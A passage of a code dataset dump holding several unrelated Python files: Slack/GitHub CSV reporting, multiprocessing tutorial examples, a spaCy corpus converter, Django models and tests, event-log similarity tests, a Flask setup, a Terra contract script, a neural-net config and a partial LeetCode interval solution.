message.get_time(), mentions))\n finally:\n file.close()\n\n def correspondence_channel_to_archive(self, organization):\n name_file = 'correspondence channel to archive in ' + organization + '.csv'\n file = open(name_file, 'wt')\n try:\n writer: csv.DictWriter = csv.writer(file)\n writer.writerow(\n ('Name Channel', 'Name Repository', 'url html', 'percentage programming file',\n 'has pull request merged',\n 'use issue for tracking',\n '# contributors', '# commits', 'last update at least in 2018'))\n for association in self._associations:\n channel: Channels = association.get_channel()\n repository: Repositories = association.get_repository()\n writer.writerow((channel.get_name_channel(),\n repository.get_repository_name(), repository.get_url_html(),\n repository.get_percentage_programming_files(),\n repository.has_pull_request_merged(), repository.use_issue_for_tracking(),\n len(repository.get_contributors()), repository.get_number_of_commits(),\n repository.last_update_at_least_in_2018()))\n finally:\n file.close()\n\n def pull_request_on_message_slack(self):\n list_thread = list()\n for association in self._associations:\n channel: Channels = association.get_channel()\n repository: Repositories = association.get_repository()\n thread = threading.Thread(target=self._create_file_pull, args=(channel, repository))\n thread.start()\n list_thread.append(thread)\n for thread in list_thread:\n thread.join()\n\n @staticmethod\n def _create_file_pull(channel, repository):\n file = open(\n 'pull request url in message in ' + channel.get_name_channel() + ' ' +\n repository.get_repository_name() + '.csv', 'w')\n try:\n writer: csv.DictWriter = csv.writer(file)\n writer.writerow(('pr url', 'merged', 'count'))\n pulls = repository.get_pulls()\n for pull in pulls:\n count_pr_url = 0\n if pull.get_state() == 'closed':\n users = channel.get_users()\n for user_key in users:\n user = users.get(user_key)\n for message in user.show_messages():\n text = message.get_message()\n if text.find(pull.get_html_url()) != -1:\n length = len(pull.get_html_url()) + text.find(pull.get_html_url())\n if len(text) > length and (\n text[length] == '>' or text[length] == ' '):\n count_pr_url = count_pr_url + 1\n elif len(text) == length:\n count_pr_url = count_pr_url + 1\n writer.writerow((pull.get_html_url(), pull.is_merged(), count_pr_url))\n finally:\n file.close()\n\n def get_len_message_for_channel(self, organization):\n file = open(\n 'number of messages ' + organization + '.csv', 'w')\n try:\n writer: csv.DictWriter = csv.writer(file)\n writer.writerow(('organization', 'channel slack', '# messages'))\n for association in self._associations:\n channel: Channels = association.get_channel()\n len_message_channel = 0\n users = channel.get_users()\n for user_key in users:\n user: Users = users.get(user_key)\n len_message_channel = len_message_channel + user.len_messages()\n writer.writerow((association.get_name_organization(), channel.get_name_channel(), len_message_channel))\n finally:\n file.close()\n\n def messages_slack_url_github(self):\n for association in self._associations:\n path = 'message url ' + association.get_name_organization()\n if os.path.isdir(path) is not True:\n os.makedirs(path)\n url_message_slack = UrlMessagesSlack(association)\n url_message_slack.generic_url_github()\n url_message_slack.issue_open_in_this_repository()\n url_message_slack.issue_open_not_in_this_repository()\n url_message_slack.issue_closed_in_this_repository()\n url_message_slack.issue_closed_not_in_this_repository()\n 
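# NOTE (added): the issue_*/pull_* calls around this point appear to split\n            # the shared-URL report along three axes: issue vs. pull request, open vs.\n            # closed, and whether the link targets this association's own repository;\n            # each call is assumed to write one CSV, like generic_url_github() above.\n            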
url_message_slack.pull_open_in_this_repository()\n url_message_slack.pull_open_not_in_this_repository()\n url_message_slack.pull_closed_in_this_repository()\n url_message_slack.pull_closed_not_in_this_repository()\n url_message_slack.dif_message_date()\n\n\n","sub_path":"containers.py","file_name":"containers.py","file_ext":"py","file_size_in_byte":8968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"165752446","text":"import multiprocessing\nimport week3_multiprocessing_import\nimport time\nimport sys\nimport logging\n\n\ndef multiprocessing_simple():\n def worker():\n print('worker')\n for i in range(5):\n jobs =[]\n p=multiprocessing.Process(target=worker)\n jobs.append(p)\n p.start()\n\ndef multiprocessing_simpleags():\n def worker(num):\n print(\"worker\",num)\n jobs =[]\n for i in range(5):\n p =multiprocessing.Process(target=worker,args=(i,))\n jobs.append(p)\n p.start()\n\ndef multiprocessing_import_main():\n jobs =[]\n for i in range(5):\n p =multiprocessing.Process(\n target=week3_multiprocessing_import.worker,\n )\n jobs.append(p)\n p.start()\n\ndef multiprocessing_names():\n def worker():\n name=multiprocessing.current_process().name #获取当前进程的名字\n print(name,'Starting')\n time.sleep(2)\n print(name,'Exiting')\n \n def my_service():\n name =multiprocessing.current_process().name\n print(name,'Staring')\n time.sleep(3)\n print(name,'Exiting')\n \n service =multiprocessing.Process(\n name=\"my_service\",\n target=my_service,\n )\n\n worker_1 =multiprocessing.Process(\n name=\"worker_1\",\n target=worker,\n )\n\n worker_2 =multiprocessing.Process(\n target=worker,\n )\n\n worker_1.start()\n worker_2.start()\n service.start()\n\ndef multiprocessing_daemon():\n def daemon():\n p=multiprocessing.current_process()\n print('starting:',p.name,p.pid)\n sys.stdout.flush()\n #在Linux系统下,必须加入sys.stdout.flush()才能一秒输一个数字\n #在Windows系统下,加不加sys.stdout.flush()都能一秒输出一个数字\n time.sleep(2)\n print('exiting:',p.name,p.pid)\n sys.stdout.flush()\n \n def non_daemon():\n p=multiprocessing.current_process()\n print('starting:',p.name,p.pid)\n sys.stdout.flush()\n print('exiting:',p.name,p.pid)\n sys.stdout.flush()\n\n d =multiprocessing.Process(\n name='daemon',\n target=daemon,\n )\n d.daemon =True\n\n n =multiprocessing.Process(\n name='non-daemon',\n target=non_daemon,\n )\n \n n.daemon =False\n\n #n.start()\n d.start()\n time.sleep(1)\n n.start()\n\ndef multiprocessing_daemon_join():\n def daemon():\n name =multiprocessing.current_process().name\n print('starting:',name)\n time.sleep(2)\n print('exiting:',name)\n \n def non_daemon():\n name =multiprocessing.current_process().name\n print('starting:',name)\n print('exiting:',name)\n\n d =multiprocessing.Process(\n name ='daemon',\n target=daemon\n ) \n d.daemon =True\n\n n =multiprocessing.Process(\n name ='non-daemon',\n target=non_daemon\n )\n n.daemon =False\n\n d.start() \n n.start()\n\n d.join(3)\n print('d.is_alive()',d.is_alive())\n n.join() \n\ndef multiprocessing_terminate():\n #但是如果进程似乎挂起或死锁,则可以强制将其杀死。 。调用terminate() 流程对象将杀死子流程。\n def slow_worker():\n print('starting worker')\n time.sleep(0.2)\n print('finished worker')\n\n p =multiprocessing.Process(target=slow_worker)\n print('BEFORE',p,p.is_alive())\n\n p.start()\n print('DURING:',p,p.is_alive())\n\n time.sleep(0.1)\n p.terminate()\n print('TERMINATED',p,p.is_alive())\n\n p.join()\n print('JOINED:',p,p.is_alive())\n\ndef multiprocessing_exitcode():\n def exit_error():\n sys.exit(1)\n \n def exit_ok():\n return\n \n def 
return_value():\n        return 1\n    \n    def raise_runtime_error():\n        raise RuntimeError('There was an error!')\n    \n    def terminated():\n        time.sleep(3)\n\n    jobs =[]\n    funcs =[\n        exit_error,\n        exit_ok,\n        return_value,\n        raise_runtime_error,\n        terminated,\n    ]\n    for func in funcs:\n        print('starting process for',func.__name__)\n        j =multiprocessing.Process(target=func,name =func.__name__)\n        jobs.append(j)\n        j.start()\n    \n    jobs[-1].terminate()\n    \n    for job in jobs:\n        # exitcode == 0: no error; > 0: the process hit an error and exited with that code; < 0: the process was killed by signal -1*exitcode\n        job.join()\n        print('{:>15}.exitcode ={}'.format(job.name,job.exitcode))\n    \n\ndef multiprocessing_log_to_stderr():\n    def worker():\n        print('Doing some work')\n        sys.stdout.flush()\n\n    multiprocessing.log_to_stderr(logging.DEBUG)\n    logger =multiprocessing.get_logger() # configure the record level via get_logger\n    logger.setLevel(logging.INFO)\n    p =multiprocessing.Process(target=worker)\n    p.start()\n    p.join()\n\n\ndef multiprocessing_subclass():\n    # override the run method\n    class Worker(multiprocessing.Process):\n        def run(self):\n            print('In{}'.format(self.name))\n            return\n\n    jobs =[]\n    for i in range(5):\n        p =Worker()\n        jobs.append(p)\n        p.start()\n    \n    for j in jobs:\n        j.join()\n\n\nif __name__ ==\"__main__\":\n    multiprocessing_log_to_stderr()\n","sub_path":"week3-multiprocessing.py","file_name":"week3-multiprocessing.py","file_ext":"py","file_size_in_byte":5184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"362033125","text":"\"\"\"\nConvert EWT to a corpus of txt files.\n\nOnly works on unix systems.\n\"\"\"\nimport os\n\nfrom spacy.training import Corpus\nimport spacy\n\nd_path = \"syllabus/classes/class2/data\"\nwrite_path = \"syllabus/classes/class2/train_corpus\"\n\nfor ds in [\"dev\", \"test\", \"train\"]:\n    cmd = f\"python -m spacy convert {d_path}/UD_English-EWT-master/en_ewt-ud-{ds}.conllu {d_path} --converter conllu --n-sents 10 --merge-subtokens\"\n    os.system(cmd)\n\n# only write train\ncorpus = Corpus(f\"{d_path}/en_ewt-ud-train.spacy\")\nnlp = spacy.blank(\"en\")\ntrain_data = corpus(nlp)\n\nfor i, example in enumerate(train_data):\n    path = os.path.join(write_path, f\"{i}.txt\")\n    with open(path, \"w\") as f:\n        f.write(example.y.text)\n\n","sub_path":"syllabus/classes/data/English Dependency Treeback/ewt_to_corpus.py","file_name":"ewt_to_corpus.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"67096246","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.core.validators import MaxValueValidator, MinValueValidator\nfrom django.utils import timezone  # needed by the saved_date() helpers below\n# Create your models here.\n\nclass Users(models.Model):\n    STANDARD = (\n        (0,\"other\"),(1,\"STD-I\"),(2,\"STD-II\"),(3,\"STD-III\"),\n        (4,\"STD-IV\"),(5,\"STD-V\"),(6,\"STD-VI\"),(7,\"STD-VII\"),\n        (8,\"STD-VIII\"),(9,\"STD-IX\"),(10,\"STD-X\"),(11,\"STD-XI\"),\n        (12,\"STD-XII\"))\n    GENDER = ((1,\"F\"),(2,\"M\"))\n    name = models.CharField(max_length=25)\n    surname = models.CharField(max_length=25)\n    gender = models.IntegerField(choices=GENDER)\n    age = models.IntegerField()\n    standard = models.IntegerField(choices=STANDARD)\n    school_name = models.CharField(max_length=100)\n    pincode = models.CharField(max_length=20)\n    users = models.OneToOneField(User, on_delete=models.CASCADE, null=True)\n\n    def __str__(self):\n        return '''Users(name={}, surname={}, gender={}, age={}, standard={}, school_name={}, pincode={})'''.format(self.name, self.surname, self.gender, self.age, self.standard, self.school_name, 
self.pincode)\n\nclass Notes(models.Model):\n\n author = models.ForeignKey('auth.User', on_delete=None)\n notes = models.TextField(default='')\n date = models.DateTimeField(auto_now_add=True)\n types = models.CharField(max_length=20)\n\n\n\n def saved_date(self):\n self.date = timezone.now()\n self.save()\n\n def snippest(self):\n return self.notes[:50]+'...'\n\nclass UserActivityPath(models.Model):\n user = models.ForeignKey('auth.User', on_delete=None)\n date = models.DateTimeField(auto_now_add=True)\n seeking = models.IntegerField(default = 0)\n pauses = models.IntegerField(default = 0)\n replaycount = models.IntegerField(default = 0)\n path = models.CharField(max_length=100)\n\n\n def saved_date(self):\n self.date = timezone.now()\n self.save()\n\n def __str__(self):\n return '''UserActivity(user={},date={}, seeking={}, pauses={}, replaycount={}, path={})'''.format(self.user,self.date, self.seeking, self.pauses, self.replaycount, self.path)\n\n\nclass Questions(models.Model):\n user = models.ForeignKey('auth.User',on_delete=None)\n date = models.DateTimeField(auto_now_add=True)\n basic = models.IntegerField(default=0)\n intermediate=models.IntegerField(default=0)\n advance=models.IntegerField(default=0)\n avg = models.IntegerField(default=0)\n","sub_path":"ML/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"266509573","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Dec 14 18:08:23 2020\n\n@author: Manuel Camargo\n\"\"\"\nimport os\nimport pandas as pd\nimport analyzers.sim_evaluator as sim\nfrom utils.support import timeit\nfrom copy import deepcopy\n\ndef load_parms():\n parms = dict()\n parms['output'] = os.path.join('output_files')\n parms['one_timestamp'] = False # Only one timestamp in the log\n column_names = {'Case ID': 'caseid',\n 'Activity': 'task',\n 'lifecycle:transition': 'event_type',\n 'Resource': 'user'}\n # Event-log reading options\n parms['read_options'] = {\n 'timeformat': '%Y-%m-%dT%H:%M:%S.%f',\n 'column_names': column_names,\n 'one_timestamp': parms['one_timestamp'],\n 'filter_d_attrib': True}\n return parms\n\ndef timeseries_test():\n parms = load_parms()\n serie1 = pd.read_csv(os.path.join('tests', 'fixtures', 'ia_valdn.csv'))\n serie2 = pd.read_csv(os.path.join('tests', 'fixtures', 'ia_valdn_gen.csv'))\n serie1 = serie1[['caseid', 'timestamp']]\n serie1['timestamp'] = pd.to_datetime(serie1['timestamp'], \n format=\"%Y-%m-%d %H:%M:%S.%f\")\n serie2 = serie2[['caseid', 'timestamp']]\n serie2['timestamp'] = pd.to_datetime(serie2['timestamp'], \n format=\"%Y-%m-%d %H:%M:%S.%f\")\n \n evaluation = sim.SimilarityEvaluator(serie1, serie2, parms, dtype='serie')\n evaluation.measure_distance('day_emd')\n print(evaluation.similarity)\n evaluation.measure_distance('day_hour_emd')\n print(evaluation.similarity)\n evaluation.measure_distance('cal_emd')\n print(evaluation.similarity)\n\ndef log_test():\n parms = load_parms()\n event_log = pd.read_csv(os.path.join('tests', 'fixtures', 'event_log.csv'))\n event_log['start_timestamp'] = pd.to_datetime(event_log['start_timestamp'], \n format=\"%Y-%m-%d %H:%M:%S.%f\")\n event_log['end_timestamp'] = pd.to_datetime(event_log['end_timestamp'], \n format=\"%Y-%m-%d %H:%M:%S.%f\")\n event_log = event_log[~event_log.task.isin(['Start', 'End'])]\n if pd.api.types.is_numeric_dtype(event_log['caseid']):\n event_log['caseid'] = event_log['caseid']+1\n event_log['caseid'] = 
event_log['caseid'].astype(str)\n event_log['caseid'] = 'Case' + event_log['caseid']\n # Duplicate\n event_log_2 = deepcopy(event_log)\n # Add columns\n evaluation = sim.SimilarityEvaluator(event_log, event_log_2, parms, max_cases=100)\n measure(evaluation)\n \ndef log_test_3():\n parms = load_parms()\n event_log = pd.read_csv(os.path.join('tests', 'fixtures', 'event_log.csv'))\n event_log['start_timestamp'] = pd.to_datetime(event_log['start_timestamp'], \n format=\"%Y-%m-%d %H:%M:%S.%f\")\n event_log['end_timestamp'] = pd.to_datetime(event_log['end_timestamp'], \n format=\"%Y-%m-%d %H:%M:%S.%f\")\n event_log = event_log[~event_log.task.isin(['Start', 'End'])]\n if pd.api.types.is_numeric_dtype(event_log['caseid']):\n event_log['caseid'] = event_log['caseid']+1\n event_log['caseid'] = event_log['caseid'].astype(str)\n event_log['caseid'] = 'Case' + event_log['caseid']\n # Duplicate\n event_log_2 = deepcopy(event_log)\n # Add columns\n evaluation = sim.SimilarityEvaluator(event_log, event_log_2, parms, max_cases=100)\n measure(evaluation)\n\n\ndef log_test_2():\n parms = load_parms()\n event_log = pd.read_csv(os.path.join('tests', 'fixtures', 'BPI_Challenge_2012_W_Two_TS_test.csv'))\n event_log['start_timestamp'] = pd.to_datetime(event_log['start_timestamp'], \n format=\"%Y-%m-%d %H:%M:%S.%f\")\n event_log['end_timestamp'] = pd.to_datetime(event_log['end_timestamp'], \n format=\"%Y-%m-%d %H:%M:%S.%f\")\n event_log = event_log[~event_log.task.isin(['Start', 'End'])]\n event_log['caseid'] = event_log['caseid']+1\n max_c = event_log.caseid.max()\n event_log_c = deepcopy(event_log)\n event_log_c['caseid'] = event_log_c['caseid'] + max_c\n event_log = pd.concat([event_log, event_log_c], axis=0, ignore_index=True)\n event_log['caseid'] = event_log['caseid'].astype(str)\n event_log['caseid'] = 'Case' + event_log['caseid']\n # Duplicate\n event_log_2 = deepcopy(event_log)\n # Add columns\n evaluation = sim.SimilarityEvaluator(event_log, event_log_2, parms)\n measure(evaluation)\n\n@timeit\ndef measure(evaluation):\n evaluation.measure_distance('mae', verbose=False)\n print(evaluation.similarity)\n evaluation.measure_distance('dl', verbose=True) \n print(evaluation.similarity)\n evaluation.measure_distance('tsd', verbose=False) \n print(evaluation.similarity)\n evaluation.measure_distance('dl_mae', verbose=False) \n print(evaluation.similarity)\n ","sub_path":"support_modules-master/tests/analyzer_test.py","file_name":"analyzer_test.py","file_ext":"py","file_size_in_byte":4953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"510897954","text":"from flask import Flask\nfrom flask_login import LoginManager\nfrom flask_bcrypt import Bcrypt\nfrom flask_mongoengine import MongoEngine\n\nfrom config import Config\nfrom app.logger import MailgunLogger\n\nimport logging, sys\n\napp = Flask(__name__)\napp.config.from_object(Config)\napp.logger.setLevel(logging.DEBUG)\n\ndb = MongoEngine()\ndb.init_app(app)\n\nbcrypt = Bcrypt()\nbcrypt.init_app(app)\n\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)\n\nstdout_logger = logging.StreamHandler(sys.stdout)\nstdout_logger.setFormatter(logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s'))\nstdout_logger.setLevel(logging.DEBUG)\napp.logger.addHandler(stdout_logger)\n\nmailgun_logger = MailgunLogger()\nmailgun_logger.setLevel(logging.ERROR)\nmailgun_logger.setFormatter(logging.Formatter('''\n Message type: %(levelname)s\n Location: %(pathname)s:%(lineno)d\n Module: %(module)s\n 
Function: %(funcName)s\n Time: %(asctime)s\n\n Message:\n\n %(message)s\n'''))\napp.logger.addHandler(mailgun_logger)\n\nfrom app import routes\n","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"621900944","text":"# coding: utf-8\n\nfrom django.test import TestCase\nfrom datetime import datetime, date\nfrom ..models import Person, Request\nfrom model_mommy import mommy\n\n# Create your tests here.\n\n\nclass PersonModelTest(TestCase):\n\n \"\"\"\n Test Person model (ticket #1)\n \"\"\"\n\n def setUp(self):\n\n \"\"\"\n Add Person's object to DB\n \"\"\"\n\n self.pers = mommy.make(\n Person,\n first_name=u\"Моє І'мя\",\n last_name=u\"Моє Прізвище\",\n birthday=date(1971, 11, 21),\n email=u\"myemail@ukr.net\",\n other_contacts=u\"Україна\\n+380673332211\"\n )\n\n def test_only_one_person(self):\n\n \"\"\"\n Test only one Person's object in DB\n \"\"\"\n\n self.assertEqual(Person.objects.count(), 1)\n\n def test_fields(self):\n\n \"\"\"\n Test Person model fields\n \"\"\"\n\n pers_db = Person.objects.first()\n\n self.assertEqual(pers_db.created.date(), datetime.now().date())\n self.assertEqual(pers_db.modified.date(), datetime.now().date())\n self.assertEqual(pers_db.first_name, self.pers.first_name)\n self.assertEqual(pers_db.last_name, self.pers.last_name)\n self.assertEqual(pers_db.birthday, self.pers.birthday)\n self.assertEqual(pers_db.bio, self.pers.bio)\n self.assertEqual(pers_db.email, self.pers.email)\n self.assertEqual(pers_db.jid, self.pers.jid)\n self.assertEqual(pers_db.skype, self.pers.skype)\n self.assertEqual(pers_db.other_contacts, self.pers.other_contacts)\n\n def test_unicode_method(self):\n\n \"\"\"\n Test Person model unicode method\n \"\"\"\n\n pers_db = Person.objects.first()\n\n self.assertEqual(\n pers_db.__unicode__(),\n u\"%s %s\" % (self.pers.last_name, self.pers.first_name)\n )\n\n\nclass RequestModelTest(TestCase):\n\n \"\"\"\n Test Request model (ticket #3)\n \"\"\"\n\n def setUp(self):\n\n \"\"\"\n Add Request object to DB\n \"\"\"\n\n self.req = mommy.make(\n Request,\n path_info=u\"/requests/\",\n remote_ip=u\"91.129.117.10\"\n )\n\n def test_fields(self):\n\n \"\"\"\n Test Request model fields\n \"\"\"\n\n req_db = Request.objects.first()\n\n self.assertEqual(req_db.created.date(), datetime.now().date())\n self.assertEqual(req_db.modified.date(), datetime.now().date())\n self.assertEqual(req_db.ajax, self.req.ajax)\n self.assertEqual(req_db.path_info, self.req.path_info)\n self.assertEqual(req_db.method, self.req.method)\n self.assertEqual(req_db.protocol, self.req.protocol)\n self.assertEqual(req_db.remote_ip, self.req.remote_ip)\n self.assertEqual(req_db.secure, self.req.secure)\n self.assertEqual(req_db.referer, self.req.referer)\n\n def test_unicode(self):\n\n \"\"\"\n Test Request model unicode\n \"\"\"\n\n req_db = Request.objects.first()\n\n self.assertEqual(\n req_db.__unicode__(),\n u\"%s asks %s\" % (self.req.remote_ip, self.req.path_info)\n )\n","sub_path":"apps/hello/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":3111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"438617708","text":"from pathlib import Path\n\nfrom terra_sdk.client.lcd.api.tx import CreateTxOptions\nfrom terra_sdk.client.localterra import LocalTerra\nfrom terra_sdk.core import Coins\nfrom terra_sdk.core.fee import Fee\nfrom 
terra_sdk.core.wasm import MsgExecuteContract, MsgInstantiateContract, MsgStoreCode\nfrom terra_sdk.util.contract import get_code_id, get_contract_address, read_file_as_b64\n\n\ndef main():\n terra = LocalTerra()\n terra.gas_prices = \"1uluna\"\n test1 = terra.wallets[\"test1\"]\n\n store_code_tx = test1.create_and_sign_tx(\n CreateTxOptions(\n msgs=[\n MsgStoreCode(\n test1.key.acc_address,\n read_file_as_b64(Path(__file__).parent / \"./strtest.wasm\"),\n )\n ],\n gas_adjustment=1.75,\n )\n )\n store_code_tx_result = terra.tx.broadcast(store_code_tx)\n print(store_code_tx_result)\n\n code_id = get_code_id(store_code_tx_result)\n print(f\"cod_id:{code_id}\")\n\n instantiate_tx = test1.create_and_sign_tx(\n CreateTxOptions(\n msgs=[\n MsgInstantiateContract(\n test1.key.acc_address, test1.key.acc_address, code_id, \"test_init\"\n )\n ],\n gas_prices=\"10uluna\",\n gas_adjustment=2,\n )\n )\n print(instantiate_tx)\n instantiate_tx_result = terra.tx.broadcast(instantiate_tx)\n print(instantiate_tx_result)\n contract_address = get_contract_address(instantiate_tx_result)\n # \"\"\"\n # contract_address = \"terra1e8d3cw4j0k5fm9gw03jzh9xzhzyz99pa8tphd8\"\n result = terra.wasm.contract_query(contract_address, \"count\")\n print(\"get_count1: \", result)\n execute_tx = test1.create_and_sign_tx(\n CreateTxOptions(\n msgs=[\n MsgExecuteContract(test1.key.acc_address, contract_address, \"increment\")\n ],\n gas_adjustment=1.75,\n )\n )\n # {\"uluna\": 1000},\n\n execute_tx_result = terra.tx.broadcast(execute_tx)\n print(execute_tx_result)\n\n result = terra.wasm.contract_query(contract_address, \"count\")\n print(\"get_count2: \", result)\n result = terra.wasm.contract_query(contract_address, \"test\")\n print(\"get_test: \", result)\n\n\n# try:\nmain()\n# except Exception as e:\n# print(\"exception occured\")\n# print(e)\n","sub_path":"integration_tests/contract_str.py","file_name":"contract_str.py","file_ext":"py","file_size_in_byte":2334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"433772067","text":"import os\n\nbilly_directory = '/home/cpd/Projects/billy'\ndata_directory = billy_directory + '/catalog'\nif not os.path.exists(data_directory):\n os.makedirs(data_directory)\n\n# note assumes that in data_directory there is:\n# sw_data/cutout_catalog/catalog.csv\n# sw_data/cutout_catalog/cutouts\n# galzoo_data/training_solutions_rev1.csv\n# galzoo_data/images_training_rev1\n\nmodel_directory = billy_directory + '/trained_models'\nif not os.path.exists(model_directory):\n os.makedirs(model_directory)\n\n# param to decrease memory usage. 
Must play with!\nbase_div=4\ntest_code = False\n\nif test_code:\n # likely testing\n number_data_train = 1000\n number_data_test = 1000\nelse:\n number_data_train = -1 # 1000\n number_data_test = -1 #1000\n\n\nhyperparameters = {'default_learning_rate': 1.7e-3,\n 'default_reg_strength': 3.4e-6,\n 'batch_size': 32,\n 'default_use_nesterov_momentum': False,\n 'default_use_rms_prop': False,\n 'default_momentum_decay_rate': 0.9,\n 'rotate_and_flip': True,\n 'random_seed': None}\n\nalex_net = [\n\n # {'type':'convolution', 'stride': 4, 'filter_size':11, 'depth':96, 'pad':3, 'dropout_prob': 0, 'activation':'relu'},\n {'type':'convolution', 'stride': 2, 'filter_size':5, 'depth':int(96/base_div), 'pad':9, 'dropout_prob': 0, 'activation':'relu'},\n {'type':'max_pool', 'stride':2, 'filter_size':3},\n\n {'type':'convolution', 'stride': 1, 'filter_size':5, 'depth':int(256/base_div), 'pad':2, 'dropout_prob': 0, 'activation':'relu'},\n {'type':'max_pool', 'stride':2, 'filter_size':3},\n\n {'type':'convolution', 'stride': 1, 'filter_size':3, 'depth':int(384/base_div), 'pad':1, 'dropout_prob': 0, 'activation':'relu'},\n {'type':'convolution', 'stride': 1, 'filter_size':3, 'depth':int(384/base_div), 'pad':1, 'dropout_prob': 0, 'activation':'relu'},\n {'type':'convolution', 'stride': 1, 'filter_size':3, 'depth':int(256/base_div), 'pad':1, 'dropout_prob': 0, 'activation':'relu'},\n {'type':'max_pool', 'stride':2, 'filter_size':3},\n\n {'type':'fully_connected', 'depth': int(4096/base_div), 'dropout_prob': 0.5, 'activation':'maxout'},\n {'type':'fully_connected', 'depth': int(4096/base_div), 'dropout_prob': 0.5, 'activation':'maxout'},\n {'type':'softmax', 'cost_function':'rms_error'}]\n\nandrew_net = [\n # 96x96x3 = 27,648 input neurons\n {'type':'convolution', 'stride': 2, 'filter_size':10, 'depth':int(96/base_div), 'pad':False, 'dropout_prob': 0, 'activation':'relu'}, # 96 -> 44, 185,856 neurons, 28,800 activations\n {'type':'max_pool', 'stride':2}, # 44 -> 22, 92,928 neurons, 0 activations\n\n {'type':'convolution', 'stride': 1, 'filter_size':6, 'depth':int(256/base_div), 'pad':False, 'dropout_prob': 0, 'activation':'relu'}, # 22 -> 17, 73,984 neurons, 884,736 activations\n {'type':'convolution', 'stride': 1, 'filter_size':4, 'depth':int(256/base_div), 'pad':False, 'dropout_prob': 0, 'activation':'relu'}, # 17 -> 14, 50,176 neurons, 1,048,576 activations\n {'type':'max_pool', 'stride':2}, # 14 -> 7, 25,088 neurons, 0 activations\n\n {'type':'fully_connected', 'depth': int(4096/base_div), 'dropout_prob': 0.5, 'activation':'maxout'}, # 4,096 neurons, 2 x 51,380,224 activations \n {'type':'fully_connected', 'depth': int(4096/base_div), 'dropout_prob': 0.5, 'activation':'maxout'}, # 4,096 neurons, 2 x 16,777,216 activations\n {'type':'softmax', 'cost_function':'rms_error'}] # 37 neurons, 151,552 activations (galzoo output)\n\n#####\n# hyperparameter parameters\n#####\n\ngalzoo_random_hyperparameter_epochs = 20\ngalzoo_random_hyperparameter_base_epochs = 5\ngalzoo_random_hyperparameter_lrmin = -0.5\ngalzoo_random_hyperparameter_lrmax = 0.5\ngalzoo_random_hyperparameter_regmin = -4\ngalzoo_random_hyperparameter_regmax = -3.5\ngalzoo_random_hyperparameter_min_train = 0.72\ngalzoo_random_hyperparameter_min_save = 0.80\n\nsw_random_hyperparameter_binary_classification = True\nsw_random_hyperparameter_epochs = 100\nsw_random_hyperparameter_base_epochs = 5\nsw_random_hyperparameter_lrmin = -2.5\nsw_random_hyperparameter_lrmax = -1.5\nsw_random_hyperparameter_regmin = -8\nsw_random_hyperparameter_regmax = 
-3\nsw_random_hyperparameter_min_train = 0.8\nsw_random_hyperparameter_min_save = 0.9\n\n#####\n# Further train parameters\n#####\n\ngalzoo_further_train_pre_epochs = 120\ngalzoo_further_train_epochs = 20\ngalzoo_further_train_iterations = 6\ngalzoo_further_train_learning_rate = 1.95419652268\ngalzoo_further_train_reg_strength = 0.000109061586277\n\nsw_further_train_pre_epochs = 105\nsw_further_train_epochs = 50\nsw_further_train_iterations = 10\nsw_further_train_binary_classification = True\nsw_further_train_learning_rate = 0.0246245291367\nsw_further_train_reg_strength = 2.46381024024e-08\n\n#####\n# fixed layers\n#####\nfix_layers = [0]\ntl_pre_epochs = 0\n","sub_path":"code/tl_production/billy_config_cpd.py","file_name":"billy_config_cpd.py","file_ext":"py","file_size_in_byte":5053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"113584672","text":"from typing import List\n\n#\n# @lc app=leetcode id=57 lang=python3\n#\n# [57] Insert Interval\n#\n# https://leetcode.com/problems/insert-interval/description/\n#\n# algorithms\n# Hard (32.46%)\n# Likes: 1246\n# Dislikes: 144\n# Total Accepted: 217.5K\n# Total Submissions: 669.8K\n# Testcase Example: '[[1,3],[6,9]]\\n[2,5]'\n#\n# Given a set of non-overlapping intervals, insert a new interval into the\n# intervals (merge if necessary).\n#\n# You may assume that the intervals were initially sorted according to their\n# start times.\n#\n# Example 1:\n#\n#\n# Input: intervals = [[1,3],[6,9]], newInterval = [2,5]\n# Output: [[1,5],[6,9]]\n#\n#\n# Example 2:\n#\n#\n# Input: intervals = [[1,2],[3,5],[6,7],[8,10],[12,16]], newInterval = [4,8]\n# Output: [[1,2],[3,10],[12,16]]\n# Explanation: Because the new interval [4,8] overlaps with\n# [3,5],[6,7],[8,10].\n#\n# NOTE: input types have been changed on April 15, 2019. Please reset to\n# default code definition to get new method signature.\n#\n#\n\n# @lc code=start\n\n\nclass Solution:\n def insert(self, intervals: List[List[int]], newInterval: List[int]) -> List[List[int]]:\n # Merges intervals\n def merge2(x, y):\n m2 = []\n if x[0] > y[0]: x,y = y,x\n # 1. no overlap\n if x[1] < y[0]:\n m2 = [x, y]\n # 2. full overlap\n elif x[0] <= y[0] and y[1] <= x[1]:\n m2 = [x]\n # 2. 
